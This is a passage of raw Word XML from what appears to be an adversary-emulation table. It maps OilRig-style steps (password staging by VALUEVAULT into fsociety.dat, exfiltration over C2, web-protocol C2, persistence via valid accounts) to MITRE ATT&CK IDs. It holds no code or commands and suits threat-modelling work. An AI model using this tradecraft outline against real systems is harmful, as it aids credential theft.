          <w:p w14:paraId="30C0EAE9" w14:textId="10F2E5FF" w:rsidR="00D32684" w:rsidRDefault="00D32684" w:rsidP="00602963">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="876" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7400C86E" w14:textId="61B62F32" w:rsidR="00D32684" w:rsidRDefault="00D32684" w:rsidP="00602963">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>NP-EXE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4055" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5D16115B" w14:textId="55BDF39B" w:rsidR="00D32684" w:rsidRDefault="00D32684" w:rsidP="00602963">
            <w:r>
              <w:t>[1] See above</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00602963" w:rsidRPr="00B857D7" w14:paraId="2EF27F34" w14:textId="77777777" w:rsidTr="00817791">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="58EB7D3F" w14:textId="58B38491" w:rsidR="00602963" w:rsidRDefault="00C75069" w:rsidP="00602963">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>21</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5D30B812" w14:textId="643EC887" w:rsidR="00602963" w:rsidRPr="008D7F76" w:rsidRDefault="00602963" w:rsidP="00602963">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EE0D6D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00EE0D6D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>0009 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00EE0D6D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Collection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="311270BE" w14:textId="2D0B1BB6" w:rsidR="00602963" w:rsidRPr="008D7F76" w:rsidRDefault="00602963" w:rsidP="00602963">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00602963">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T1074.001</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00EE0D6D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00EE0D6D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00602963">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Data Staged: Local Data Staging</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B7BF993" w14:textId="46D30BB6" w:rsidR="00602963" w:rsidRDefault="00C75069" w:rsidP="00602963">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4E2239FE" w14:textId="77777777" w:rsidR="00602963" w:rsidRPr="00B857D7" w:rsidRDefault="00602963" w:rsidP="00602963">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1217AAF4" w14:textId="6E6FD025" w:rsidR="00602963" w:rsidRDefault="00602963" w:rsidP="00602963">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="876" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="310618C6" w14:textId="52910DEE" w:rsidR="00602963" w:rsidRDefault="00602963" w:rsidP="00602963">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>AO-COL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4055" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="51F13E5E" w14:textId="2FF25952" w:rsidR="00602963" w:rsidRDefault="00602963" w:rsidP="00602963">
            <w:r>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidRPr="00602963">
              <w:t xml:space="preserve">Upon execution, VALUEVAULT creates a SQLITE database file in the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00602963">
              <w:t>AppData</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00602963">
              <w:t>\Roaming directory under the context of the user account it was executed by. This file is named fsociety.dat and VALUEVAULT will write the dumped passwords to this in SQL format.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001412A2" w:rsidRPr="0062544E" w14:paraId="59F6831B" w14:textId="77777777" w:rsidTr="00817791">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="02765018" w14:textId="2BC0B64A" w:rsidR="001412A2" w:rsidRPr="0062544E" w:rsidRDefault="00C75069" w:rsidP="003241F8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>22</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0FEB5142" w14:textId="77777777" w:rsidR="001412A2" w:rsidRPr="0062544E" w:rsidRDefault="001412A2" w:rsidP="003241F8">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0010 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0062544E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Exfiltration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="51990EB8" w14:textId="77777777" w:rsidR="001412A2" w:rsidRPr="0062544E" w:rsidRDefault="001412A2" w:rsidP="003241F8">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0062544E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0062544E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1041 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0062544E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Exfiltration Over C2 Channel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="77D68D18" w14:textId="08FBA3B7" w:rsidR="001412A2" w:rsidRPr="0062544E" w:rsidRDefault="00C75069" w:rsidP="003241F8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>21</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7CEFD344" w14:textId="77777777" w:rsidR="001412A2" w:rsidRPr="0062544E" w:rsidRDefault="001412A2" w:rsidP="003241F8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1788DA28" w14:textId="77777777" w:rsidR="001412A2" w:rsidRPr="0062544E" w:rsidRDefault="001412A2" w:rsidP="003241F8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00947702">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="876" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7825ED25" w14:textId="77777777" w:rsidR="001412A2" w:rsidRPr="0062544E" w:rsidRDefault="001412A2" w:rsidP="003241F8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>AO-EXF</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4055" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6207A29E" w14:textId="48DA0525" w:rsidR="001412A2" w:rsidRPr="00DD4A99" w:rsidRDefault="001412A2" w:rsidP="003241F8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r>
              <w:t>Exfiltrate data/passwords (staged above)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DC3BB8" w:rsidRPr="00B857D7" w14:paraId="382F5682" w14:textId="77777777" w:rsidTr="00817791">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="38862A8F" w14:textId="6AC02588" w:rsidR="00DC3BB8" w:rsidRDefault="00D32684" w:rsidP="003241F8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="00C75069">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0E1B71E4" w14:textId="77777777" w:rsidR="00DC3BB8" w:rsidRPr="00B857D7" w:rsidRDefault="00DC3BB8" w:rsidP="003241F8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008D7F76">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="008D7F76">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0011 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="008D7F76">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Command and Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4DECE54F" w14:textId="77777777" w:rsidR="00DC3BB8" w:rsidRPr="00B857D7" w:rsidRDefault="00DC3BB8" w:rsidP="003241F8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="008D7F76">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1071.001 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="008D7F76">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;Application Layer Protocol&gt;:Web Protocols</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1425EB5B" w14:textId="0069048F" w:rsidR="00DC3BB8" w:rsidRDefault="00C75069" w:rsidP="003241F8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="00AF3CDD">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0DC2CBDE" w14:textId="77777777" w:rsidR="00DC3BB8" w:rsidRPr="00B857D7" w:rsidRDefault="00DC3BB8" w:rsidP="003241F8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0513B3E8" w14:textId="77777777" w:rsidR="00DC3BB8" w:rsidRDefault="00DC3BB8" w:rsidP="003241F8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="876" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5FE97DDB" w14:textId="77777777" w:rsidR="00DC3BB8" w:rsidRDefault="00DC3BB8" w:rsidP="003241F8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4055" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1B8E2BB4" w14:textId="6D17ED9E" w:rsidR="00DC3BB8" w:rsidRDefault="00DC3BB8" w:rsidP="003241F8">
            <w:r>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidR="001412A2">
              <w:t>Exfiltrate data/passwords</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01755" w:rsidRPr="00ED5880" w14:paraId="05E3F382" w14:textId="77777777" w:rsidTr="00817791">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="743E95BD" w14:textId="3103C5EA" w:rsidR="00B01755" w:rsidRPr="00602963" w:rsidRDefault="00521207" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="00C75069">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="20037511" w14:textId="6F18C138" w:rsidR="00B01755" w:rsidRPr="00602963" w:rsidRDefault="00DC3BB8" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00602963">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00602963">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0003 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00602963">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Persistence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3FAECBE4" w14:textId="4C507B1C" w:rsidR="00B01755" w:rsidRPr="00602963" w:rsidRDefault="00DC3BB8" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00602963">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00602963">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1078</w:t>
            </w:r>
            <w:r w:rsidR="007169FB">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="007169FB">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Valid Accounts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2FD0C4F1" w14:textId="66C5FB56" w:rsidR="00B01755" w:rsidRPr="00602963" w:rsidRDefault="00D32684" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="00C75069">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="77202697" w14:textId="77777777" w:rsidR="00B01755" w:rsidRPr="00602963" w:rsidRDefault="00B01755" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="27757547" w14:textId="0E178881" w:rsidR="00B01755" w:rsidRPr="00602963" w:rsidRDefault="00DC3BB8" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00602963">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="876" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6020F989" w14:textId="6B3591D5" w:rsidR="00B01755" w:rsidRPr="00602963" w:rsidRDefault="00602963" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-PER</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4055" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6C11E751" w14:textId="7047AC8A" w:rsidR="00B01755" w:rsidRPr="00602963" w:rsidRDefault="00DC3BB8" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00602963">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="00446654" w:rsidRPr="00602963">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidRPr="00602963">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">] </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00602963">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>OilRig</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00602963">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
